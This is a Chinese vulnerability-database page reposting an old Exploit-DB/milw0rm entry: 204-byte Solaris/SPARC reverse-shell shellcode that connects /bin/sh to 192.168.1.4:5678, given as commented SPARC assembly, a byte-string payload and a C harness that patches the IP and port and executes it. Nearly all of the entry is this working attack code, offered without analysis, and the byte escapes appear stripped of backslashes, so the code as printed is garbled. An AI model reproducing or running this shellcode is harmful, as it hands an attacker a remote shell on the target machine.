子比主题,更优雅的Wordpress主题
更优雅的WordPress网站主题:子比主题!全面开启

Solaris/SPARC – Reverse (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)

400

Solaris/SPARC – Reverse (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)

漏洞ID 1054637 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-Solaris/SPARC – Reverse (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)-安全小百科CVE编号 N/A
 		图片[2]-Solaris/SPARC – Reverse (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Solaris_SPARC CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13496
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * Solaris shellcode - connects /bin/sh to a host
 *
 * Claes M. Nyberg 20020624
 * <[email protected]>, <[email protected]>
 */

#include <string.h>

/***********************************************************
void
main(void)
{

__asm__("
       
        ! Create socket
        mov    0x2, %o0         ! o0 = AF_INET
        mov    0x2, %o1         ! o1 = SOCK_STREAM
        xor    %o2, %o2, %o2    ! o2 = 0
        mov    0xe6, %g1        ! g1 = 230 = SYS_so_socket
        ta     8                ! socket(AF_INET, SOCK_STREAM, 0);
        add    %o0, 0x1, %l0    ! l0 = socket_fd +1 

        ! Server address
        mov    0xc0, %l1        ! 192
        sll    %l1, 0x8, %l1    ! 192.0
        or     0xa8, %l1, %l1   ! 192.168
        sll    %l1, 0x8, %l1    ! 192.168.0
        or     0x1, %l1, %l1    ! 192.168.1
        sll    %l1, 0x8, %l1    ! 192.168.1.0
        or     0x1, %l1, %l1    ! 192.168.1.1
        st     %l1, [%sp - 12]  ! Server IP 
        mov    0x2, %l1         ! AF_INET
        sth    %l1, [%sp -16]   ! Server family
        mov    0x30, %l1        ! High order byte of Port
        sll    %l1, 0x8, %l1    ! << 
        or     0x39, %l1, %l1   ! Low order byte of port
        sth    %l1, [%sp - 14]  ! Server port

        ! Connect
        sub    %sp, 16, %o1     ! o1 = &server
        mov    0x10, %o2        ! o2 = 16 = sizeof(struct sockaddr_in)
        mov    0xeb, %g1        ! g1 = 235 = SYS_connect
        ta     8                ! connect(socket_fd, &server, 16);

        ! Set up IO              
        sub    %l0, 0x1, %o0    ! o0 = socket_fd
        mov    0x9, %o1         ! o1 = F_DUP2FD
        xor    %o2, %o2, %o2    ! o2 = 0 = STDIN_FILENO
        mov    0x3e, %g1        ! g1 = 62 = SYS_fcntl
        ta     8                ! fcntl(socket_fd, F_DUP2FD, STDIN_FILENO);
        sub    %l0, 0x1, %o0    ! o0 = socket_fd
        mov    0x1, %o2         ! o2 = 1 = STDOUT_FILENO
        ta     8                ! fcntl(socket_fd, F_DUP2FD, STDOUT_FILENO);
        sub    %l0, 0x1, %o0    ! o0 = socket_fd
        mov    0x2, %o2         ! o2 = 1 = STDERR_FILENO
        ta     8                ! fcntl(socket_fd, F_DUP2FD, STDERR_FILENO);
        
        ! Execve /bin/sh
        xor    %o2, %o2, %o2    ! o2 = 0 => envp = NULL
        set    0x2f62696e, %l0  ! lo = '/bin'
        set    0x2f2f7368, %l1  ! l1 = '//sh'    
        st     %o2, [%sp - 4]   ! String ends with NULL 
        st     %l1, [%sp - 8]   ! Write //sh to stack
        st     %l0, [%sp - 12]  ! Write /bin to stack
        sub    %sp, 12, %o0     ! o0 = &string
        st     %o2, [%sp - 16]  ! argv[1] = NULL
        st     %o0, [%sp - 20]  ! argv[0] = &string
        sub    %sp, 20, %o1     ! o1 = &string
        mov    0x3b, %g1        ! g1 = 59 = SYS_execve
        ta     8                ! execve(argv[0], argv, NULL);

        ! Exit 
        mov    1, %g1           ! g1 = 1 = SYS_exit
        ta     8                ! exit();
    ");
}
***********************************************************/

/* Index of low order byte in IP address */
#define IP0       51    
#define IP1       43
#define IP2       35
#define IP3       27

/* Index of low order byte in port */
#define P0        75    
#define P1        67  

static char solaris_code[] =
    
    /* Create socket */
    "x90x10x20x02"   /* mov     2, %o0               */
    "x92x10x20x02"   /* mov     2, %o1               */
    "x94x1ax80x0a"   /* xor     %o2, %o2, %o2        */
    "x82x10x20xe6"   /* mov     230, %g1             */
    "x91xd0x20x08"   /* ta      0x8                  */
    "xa0x02x20x01"   /* add     %o0, 1, %l0          */

    /* Server address */
    "xa2x10x20xc0"   /* mov     192, %l1             */
    "xa3x2cx60x08"   /* sll     %l1, 8, %l1          */
    "xa2x14x60xa8"   /* or      %l1, 168, %l1        */
    "xa3x2cx60x08"   /* sll     %l1, 8, %l1          */
    "xa2x14x60x01"   /* or      %l1, 1, %l1          */
    "xa3x2cx60x08"   /* sll     %l1, 8, %l1          */
    "xa2x14x60x01"   /* or      %l1, 1, %l1          */
    "xe2x23xbfxf4"   /* st      %l1, [%sp - 12]      */
    "xa2x10x20x02"   /* mov     2, %l1               */
    "xe2x33xbfxf0"   /* sth     %l1, [%sp - 16]      */
    "xa2x10x20x30"   /* mov     48, %l1              */
    "xa3x2cx60x08"   /* sll     %l1, 8, %l1          */
    "xa2x14x60x39"   /* or      %l1, 57, %l1         */
    "xe2x33xbfxf2"   /* sth     %l1, [%sp - 14]      */

    /* Connect */
    "x92x23xa0x10"   /* sub     %sp, 16, %o1         */
    "x94x10x20x10"   /* mov     16, %o2              */
    "x82x10x20xeb"   /* mov     235, %g1             */
    "x91xd0x20x08"   /* ta      0x8                  */

    /* Set up IO */
    "x90x24x20x01"   /* sub     %l0, 1, %o0          */
    "x92x10x20x09"   /* mov     9, %o1               */
    "x94x1ax80x0a"   /* xor     %o2, %o2, %o2        */
    "x82x10x20x3e"   /* mov     62, %g1              */
    "x91xd0x20x08"   /* ta      0x8                  */
    "x90x24x20x01"   /* sub     %l0, 1, %o0          */
    "x94x10x20x01"   /* mov     1, %o2               */
    "x91xd0x20x08"   /* ta      0x8                  */
    "x90x24x20x01"   /* sub     %l0, 1, %o0          */
    "x94x10x20x02"   /* mov     2, %o2               */
    "x91xd0x20x08"   /* ta      0x8                  */

    /* Execve /bin/sh */
    "x94x1ax80x0a"   /* xor     %o2, %o2, %o2        */
    "x21x0bxd8x9a"   /* sethi   %hi(0x2f626800), %l0 */
    "xa0x14x21x6e"   /* or      %l0, 0x16e, %l0      */
    "x23x0bxcbxdc"   /* sethi   %hi(0x2f2f7000), %l1 */
    "xa2x14x63x68"   /* or      %l1, 0x368, %l1      */
    "xd4x23xbfxfc"   /* st      %o2, [%sp - 4]       */
    "xe2x23xbfxf8"   /* st      %l1, [%sp - 8]       */
    "xe0x23xbfxf4"   /* st      %l0, [%sp - 12]      */
    "x90x23xa0x0c"   /* sub     %sp, 12, %o0         */
    "xd4x23xbfxf0"   /* st      %o2, [%sp - 16]      */
    "xd0x23xbfxec"   /* st      %o0, [%sp - 20]      */
    "x92x23xa0x14"   /* sub     %sp, 20, %o1         */
    "x82x10x20x3b"   /* mov     59, %g1              */
    "x91xd0x20x08"   /* ta      0x8                  */

    /* Exit */
    "x82x10x20x01"   /* mov     1, %g1               */
    "x91xd0x20x08";  /* ta      0x8                  */


static char _solaris_code[] =
    "x90x10x20x02x92x10x20x02x94x1ax80x0ax82x10x20xe6"
    "x91xd0x20x08xa0x02x20x01xa2x10x20xc0xa3x2cx60x08"
    "xa2x14x60xa8xa3x2cx60x08xa2x14x60x01xa3x2cx60x08"
    "xa2x14x60x01xe2x23xbfxf4xa2x10x20x02xe2x33xbfxf0"
    "xa2x10x20x30xa3x2cx60x08xa2x14x60x39xe2x33xbfxf2"
    "x92x23xa0x10x94x10x20x10x82x10x20xebx91xd0x20x08"
    "x90x24x20x01x92x10x20x09x94x1ax80x0ax82x10x20x3e"
    "x91xd0x20x08x90x24x20x01x94x10x20x01x91xd0x20x08"
    "x90x24x20x01x94x10x20x02x91xd0x20x08x94x1ax80x0a"
    "x21x0bxd8x9axa0x14x21x6ex23x0bxcbxdcxa2x14x63x68"
    "xd4x23xbfxfcxe2x23xbfxf8xe0x23xbfxf4x90x23xa0x0c"
    "xd4x23xbfxf0xd0x23xbfxecx92x23xa0x14x82x10x20x3b"
    "x91xd0x20x08x82x10x20x01x91xd0x20x08";

int
main(void)
{
    void (*code)() = (void *)_solaris_code;
    
    _solaris_code[IP0] = 4;
    _solaris_code[IP1] = 1;
    _solaris_code[IP2] = 168;
    _solaris_code[IP3] = 192;

    _solaris_code[P0] = 0x2e;
    _solaris_code[P1] = 0x16;

    printf("Shellcode length: %dn", strlen(_solaris_code));

	/* Connect to 192.168.1.4:5678 */
    code();
    return(1);
}    

// milw0rm.com [2004-09-26]

相关推荐: Netscape JavaScript Cache Browsing Vulnerability

Netscape JavaScript Cache Browsing Vulnerability 漏洞ID 1104871 漏洞类型 Access Validation Error 发布时间 1998-09-29 更新时间 1998-09-29 CVE编号 N…

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
网络安全漏洞
# 漏洞# solaris# sparc
喜欢就支持一下吧
点赞0
分享
相关推荐
安全小百科-Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
3年前 4771
安全小百科-帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
3年前 1194
安全小百科-Solaris PAM & unix_scheme Vulnerability
Solaris PAM & unix_scheme Vulnerability
Solaris PAM & unix_scheme Vulnerability
3年前 650
安全小百科-Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
3年前 588
安全小百科-Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
3年前 531
安全小百科-iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
3年前 523
搜索
开启精彩搜索
标签云
龟背龚某龙鱼龙马龙首龙车龙身龙芯龙生九子龙火龙海市龙泉驿区龙岩市龙女龙南县龙凤龙伯龍首龍門龍身
公司成功上市啦! - 作者:KOAL格尔国信-安全小百科

公司成功上市啦! – 作者:KOAL格尔国信

admin的头像-安全小百科3年前
049730
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion-安全小百科

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

admin的头像-安全小百科3年前
47710
GeoServer漏洞利用总结及案例参考 - 作者:vlong6-安全小百科

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

admin的头像-安全小百科3年前
020430
女祭女戚-安全小百科

女祭女戚

admin的头像-安全小百科3年前
012860
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

admin的头像-安全小百科3年前
011940
科锐逆向线上班完整版视频2020年 - 作者:hgjhf63fa-安全小百科

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

admin的头像-安全小百科3年前
010510
恐龙抗狼扛的头像-安全小百科

恐龙抗狼扛1年前0

kankan
admin的头像-安全小百科

啊啊啊啊3年前0

66666666666666